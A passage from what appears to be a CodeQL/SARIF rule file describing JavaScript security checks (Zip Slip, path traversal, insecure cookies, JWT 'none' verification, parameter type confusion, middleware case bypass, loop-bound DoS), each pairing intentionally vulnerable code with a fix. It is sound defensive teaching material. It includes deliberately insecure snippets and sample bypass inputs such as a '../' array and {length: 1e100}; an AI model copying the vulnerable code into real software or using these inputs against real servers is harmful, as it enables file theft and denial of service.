.pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // BAD: This could write any file on the filesystem.\n    entry.pipe(fs.createWriteStream(fileName));\n  });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n  .pipe(unzip.Parse())\n  .on('entry', entry => {\n    const fileName = entry.path;\n    // GOOD: ensures the path is safe to write to.\n    if (fileName.indexOf('..') == -1) {\n      entry.pipe(fs.createWriteStream(fileName));\n    }\n    else {\n      console.log('skipping bad path', fileName);\n    }\n  });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n"},"properties":{"tags":["security","external/cwe/cwe-022"],"description":"Extracting files from a malicious ZIP file, or similar type of archive, without\n              validating that the destination file path is within the destination directory\n              can allow an attacker to unexpectedly gain access to resources.","id":"js/zipslip","kind":"path-problem","name":"Arbitrary file access during archive extraction (\"Zip Slip\")","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/path-injection","name":"js/path-injection","shortDescription":{"text":"Uncontrolled data used in path expression"},"fullDescription":{"text":"Accessing paths influenced by users can allow an attacker to access unexpected resources."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // BAD: This function uses unsanitized input that can read any file on the file system.\n  res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      path = require('path'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // GOOD: Verify that the file path is under the root directory\n  filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n  if (!filePath.startsWith(ROOT)) {\n    res.statusCode = 403;\n    res.end();\n    return;\n  }\n  res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n","markdown":"# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path.\n\nThe validation method you should use depends on whether you want to allow the user to specify complex paths with multiple components that may span multiple folders, or only simple filenames without a path component.\n\nIn the former case, a common strategy is to make sure that the constructed file path is contained within a safe root folder. First, normalize the path using `path.resolve` or `fs.realpathSync` to remove any \"..\" segments. You should always normalize the file path since an unnormalized path that starts with the root folder can still be used to access files outside the root folder. Then, after you have normalized the path, check that the path starts with the root folder.\n\nIn the latter case, you can use a library like the `sanitize-filename` npm package to eliminate any special characters from the file path. Note that it is *not* sufficient to only remove \"../\" sequences: for example, applying this filter to \".../...//\" would still result in the string \"../\".\n\nFinally, the simplest (but most restrictive) option is to use an allow list of safe patterns and make sure that the user input matches one of these patterns.\n\n\n## Example\nIn the first (bad) example, the code reads the file name from an HTTP request, then accesses that file within a root folder. A malicious user could enter a file name containing \"../\" segments to navigate outside the root folder and access sensitive files.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // BAD: This function uses unsanitized input that can read any file on the file system.\n  res.write(fs.readFileSync(ROOT + filePath, 'utf8'));\n});\n```\nThe second (good) example shows how to avoid access to sensitive files by sanitizing the file path. First, the code resolves the file name relative to a root folder, normalizing the path and removing any \"../\" segments in the process. Then, the code calls `fs.realpathSync` to resolve any symbolic links in the path. Finally, the code checks that the normalized path starts with the path of the root folder, ensuring the file is contained within the root folder.\n\n\n```javascript\nconst fs = require('fs'),\n      http = require('http'),\n      path = require('path'),\n      url = require('url');\n\nconst ROOT = \"/var/www/\";\n\nvar server = http.createServer(function(req, res) {\n  let filePath = url.parse(req.url, true).query.path;\n\n  // GOOD: Verify that the file path is under the root directory\n  filePath = fs.realpathSync(path.resolve(ROOT, filePath));\n  if (!filePath.startsWith(ROOT)) {\n    res.statusCode = 403;\n    res.end();\n    return;\n  }\n  res.write(fs.readFileSync(filePath, 'utf8'));\n});\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n"},"properties":{"tags":["security","external/cwe/cwe-022","external/cwe/cwe-023","external/cwe/cwe-036","external/cwe/cwe-073","external/cwe/cwe-099"],"description":"Accessing paths influenced by users can allow an attacker to access\n              unexpected resources.","id":"js/path-injection","kind":"path-problem","name":"Uncontrolled data used in path expression","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/clear-text-cookie","name":"js/clear-text-cookie","shortDescription":{"text":"Clear text transmission of sensitive cookie"},"fullDescription":{"text":"Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n","markdown":"# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-614](https://cwe.mitre.org/data/definitions/614.html).\n* Common Weakness Enumeration: [CWE-311](https://cwe.mitre.org/data/definitions/311.html).\n* Common Weakness Enumeration: [CWE-312](https://cwe.mitre.org/data/definitions/312.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n"},"properties":{"tags":["security","external/cwe/cwe-614","external/cwe/cwe-311","external/cwe/cwe-312","external/cwe/cwe-319"],"description":"Sending sensitive information in a cookie without requring SSL encryption\n              can expose the cookie to an attacker.","id":"js/clear-text-cookie","kind":"problem","name":"Clear text transmission of sensitive cookie","precision":"high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/jwt-missing-verification","name":"js/jwt-missing-verification","shortDescription":{"text":"JWT missing secret or public key verification"},"fullDescription":{"text":"The application does not verify the JWT payload with a cryptographic secret or public key."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n","markdown":"# JWT missing secret or public key verification\nApplications decoding JSON Web Tokens (JWT) may be misconfigured due to the `None` algorithm.\n\nThe `None` algorithm is selected by calling the `verify()` function with a falsy value instead of a cryptographic secret or key. The `None` algorithm disables the integrity enforcement of a JWT payload and may allow a malicious actor to make unintended changes to a JWT payload leading to critical security issues like privilege escalation.\n\n\n## Recommendation\nCalls to `verify()` functions should use a cryptographic secret or key to decode JWT payloads.\n\n\n## Example\nIn the example below, `false` is used to disable the integrity enforcement of a JWT payload. This may allow a malicious actor to make changes to a JWT payload.\n\n\n```javascript\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"none\" })\njwt.verify(token, false, { algorithms: [\"HS256\", \"none\"] })\n```\nThe following code fixes the problem by using a cryptographic secret or key to decode JWT payloads.\n\n\n```javascript\n\nconst jwt = require(\"jsonwebtoken\");\n\nconst secret = \"my-secret-key\";\n\nvar token = jwt.sign({ foo: 'bar' }, secret, { algorithm: \"HS256\" }) \njwt.verify(token, secret, { algorithms: [\"HS256\", \"none\"] })\n```\n\n## References\n* Auth0 Blog: [Meet the \"None\" Algorithm](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/#Meet-the--None--Algorithm).\n* Common Weakness Enumeration: [CWE-347](https://cwe.mitre.org/data/definitions/347.html).\n"},"properties":{"tags":["security","external/cwe/cwe-347"],"description":"The application does not verify the JWT payload with a cryptographic secret or public key.","id":"js/jwt-missing-verification","kind":"problem","name":"JWT missing secret or public key verification","precision":"high","problem.severity":"warning","security-severity":"7.0"}},{"id":"js/type-confusion-through-parameter-tampering","name":"js/type-confusion-through-parameter-tampering","shortDescription":{"text":"Type confusion through parameter tampering"},"fullDescription":{"text":"Sanitizing an HTTP request parameter may be ineffective if the user controls its type."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (file.indexOf(\"..\") !== -1) {\n    // BAD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n    // GOOD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n","markdown":"# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (file.indexOf(\"..\") !== -1) {\n    // BAD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n  path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n  var file = req.param(\"file\");\n  if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n    // GOOD\n    // we forbid relative paths that contain ..\n    // as these could leave the public directory\n    res.status(400).send(\"Bad request\");\n  } else {\n    var absolute = path.resolve(\"/public/\" + file);\n    console.log(\"Sending file: %s\", absolute);\n    res.sendFile(absolute);\n  }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n"},"properties":{"tags":["security","external/cwe/cwe-843"],"description":"Sanitizing an HTTP request parameter may be ineffective if the user controls its type.","id":"js/type-confusion-through-parameter-tampering","kind":"path-problem","name":"Type confusion through parameter tampering","precision":"high","problem.severity":"error","security-severity":"9.8"}},{"id":"js/case-sensitive-middleware-path","name":"js/case-sensitive-middleware-path","shortDescription":{"text":"Case-sensitive middleware path"},"fullDescription":{"text":"Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n","markdown":"# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n    if (!req.user.isAdmin) {\n        res.status(401).send('Unauthorized');\n    } else {\n        next();\n    }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n    res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n"},"properties":{"tags":["security","external/cwe/cwe-178"],"description":"Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.","id":"js/case-sensitive-middleware-path","kind":"problem","name":"Case-sensitive middleware path","precision":"high","problem.severity":"warning","security-severity":"7.3"}},{"id":"js/client-exposed-cookie","name":"js/client-exposed-cookie","shortDescription":{"text":"Sensitive server cookie exposed to the client"},"fullDescription":{"text":"Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n","markdown":"# Sensitive server cookie exposed to the client\nAuthentication cookies stored by a server can be accessed by a client if the `httpOnly` flag is not set.\n\nAn attacker that manages a cross-site scripting (XSS) attack can read the cookie and hijack the session.\n\n\n## Recommendation\nSet the `httpOnly` flag on all cookies that are not needed by the client.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be viewed by the client.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo force the cookie to be transmitted using SSL, set the `secure` attribute on the cookie.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* ExpressJS: [Use cookies securely](https://expressjs.com/en/advanced/best-practice-security.html#use-cookies-securely).\n* OWASP: [Set cookie flags appropriately](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#set-cookie-flags-appropriately).\n* Mozilla: [Set-Cookie](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie).\n* Common Weakness Enumeration: [CWE-1004](https://cwe.mitre.org/data/definitions/1004.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1004"],"description":"Sensitive cookies set by a server can be read by the client if the `httpOnly` flag is not set.","id":"js/client-exposed-cookie","kind":"problem","name":"Sensitive server cookie exposed to the client","precision":"high","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/loop-bound-injection","name":"js/loop-bound-injection","shortDescription":{"text":"Loop bound injection"},"fullDescription":{"text":"Iterating over an object with a user-controlled .length property can cause indefinite looping."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10<sup>100</sup> iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n\n    var ret = [];\n\n    // Potential DoS if obj.length is large.\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\nThis is not secure since an attacker can control the value of `obj.length`, and thereby cause the loop to iterate indefinitely. Here the potential DoS is fixed by enforcing that the user-controlled object is an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n    \n    if (!(obj instanceof Array)) { // Prevents DoS.\n        return [];\n    }\n\n    var ret = [];\n\n    for (var i = 0; i < obj.length; i++) {\n        ret.push(obj[i]);\n    }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-834](https://cwe.mitre.org/data/definitions/834.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n","markdown":"# Loop bound injection\nUsing the `.length` property of an untrusted object as a loop bound may cause indefinite looping since a malicious attacker can set the `.length` property to a very large number. For example, when a program that expects an array is passed a JSON object such as `{length: 1e100}`, the loop will be run for 10<sup>100</sup> iterations. This may cause the program to hang or run out of memory, which can be used to mount a denial-of-service (DoS) attack.\n\n\n## Recommendation\nEither check that the object is indeed an array or limit the size of the `.length` property.\n\n\n## Example\nIn the example below, an HTTP request handler iterates over a user-controlled object `obj` using the `obj.length` property in order to copy the elements from `obj` to an array.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.post(\"/foo\", (req, res) => {\n    var obj = req.body;\n\n    var ret = [];\n\n    // Potential DoS if obj.length is large.\n    for (var i = 0; i < obj.length; i++) {\n        